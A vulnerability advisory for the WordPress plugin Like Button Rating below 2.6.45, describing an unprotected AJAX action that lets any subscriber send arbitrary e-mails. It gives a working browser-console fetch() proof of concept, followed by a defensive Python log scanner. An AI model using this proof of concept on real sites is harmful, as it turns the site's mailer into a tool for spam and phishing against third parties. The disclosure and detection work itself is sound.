wpexploit
Krzysztof Zając
WPEX-ID: 180F8E87-1463-43BB-A901-80031127723A
History: May 23, 2022 - 12:00 a.m.

Like Button Rating < 2.6.45 - Arbitrary e-mail Sending

Published: 2022-05-23 00:00:00
Author: Krzysztof Zając
Tags: arbitrary e-mail sending, browser developer console, fetch api, wordpress security

EPSS

0.001

Percentile

24.8%

The plugin allows any logged-in user, such as a subscriber, to send arbitrary e-mails to any recipient, with any subject and body. The notification-test AJAX action (likebtn_test_vote_notification) is reachable through admin-ajax.php without an adequate capability check, so the recipient, subject and body supplied in the request are passed straight to the mailer.

As a subscriber, run the following command in the web developer console of the browser:

// Proof of concept from the advisory. The recipient address was obfuscated
// in the scraped source ("[email protected]"); RECIPIENT_EMAIL is a placeholder for it.
fetch("/wp-admin/admin-ajax.php?action=likebtn_test_vote_notification", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "options[likebtn_notify_to]=RECIPIENT_EMAIL&options[likebtn_notify_subject]=hehehe&options[likebtn_notify_text]=Hopsasa</b><h1>",
  "method": "POST",
  "credentials": "include"   // send the logged-in session cookie
})
  .then(response => response.text())
  .then(data => console.log(data));
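A defender-side check, added here and not part of the advisory: a Python script that scans web-server access-log lines (combined format) for calls to the admin-ajax action named above and groups them by client IP. The log lines are constructed samples and the host blog.example is made up; note that the action only shows up in the access log when it is passed in the query string, as the PoC does, so body-only variants need a WAF or audit log that records POST bodies.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" access-log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# AJAX action named in the advisory for Like Button Rating < 2.6.45.
VULN_ACTION = "likebtn_test_vote_notification"


def is_likebtn_notification_call(path: str) -> bool:
    """True when the request targets admin-ajax.php with the vulnerable action in the query string."""
    parts = urlsplit(path)
    if parts.path != "/wp-admin/admin-ajax.php":
        return False
    return VULN_ACTION in parse_qs(parts.query).get("action", [])


def scan_access_log(lines):
    """Return (hits, per_ip): matching parsed records and a Counter of hits per client IP."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        rec = m.groupdict()
        if is_likebtn_notification_call(rec["path"]):
            hits.append(rec)
    return hits, Counter(h["ip"] for h in hits)


# Constructed sample log: two repeated calls from one client, one from another, plus normal traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [23/May/2022:10:15:01 +0000] "POST /wp-admin/admin-ajax.php?action=likebtn_test_vote_notification HTTP/1.1" 200 14 "https://blog.example/wp-admin/" "Mozilla/5.0"
203.0.113.10 - - [23/May/2022:10:15:02 +0000] "POST /wp-admin/admin-ajax.php?action=likebtn_test_vote_notification HTTP/1.1" 200 14 "https://blog.example/wp-admin/" "Mozilla/5.0"
198.51.100.7 - - [23/May/2022:10:16:40 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 63 "https://blog.example/wp-admin/post.php" "Mozilla/5.0"
198.51.100.7 - - [23/May/2022:10:17:00 +0000] "GET /wp-admin/admin-ajax.php?action=likebtn_test_vote_notification&x=1 HTTP/1.1" 200 14 "-" "curl/7.81.0"
192.0.2.5 - - [23/May/2022:10:18:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    found, by_ip = scan_access_log(SAMPLE_LOG)
    for ip, n in by_ip.most_common():
        print(f"{ip}: {n} call(s) to {VULN_ACTION}")
```

Any hit from a low-privilege account (or a burst of hits from one IP) on a site still running a version below 2.6.45 is worth correlating with the mail server's outbound log for that time window.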
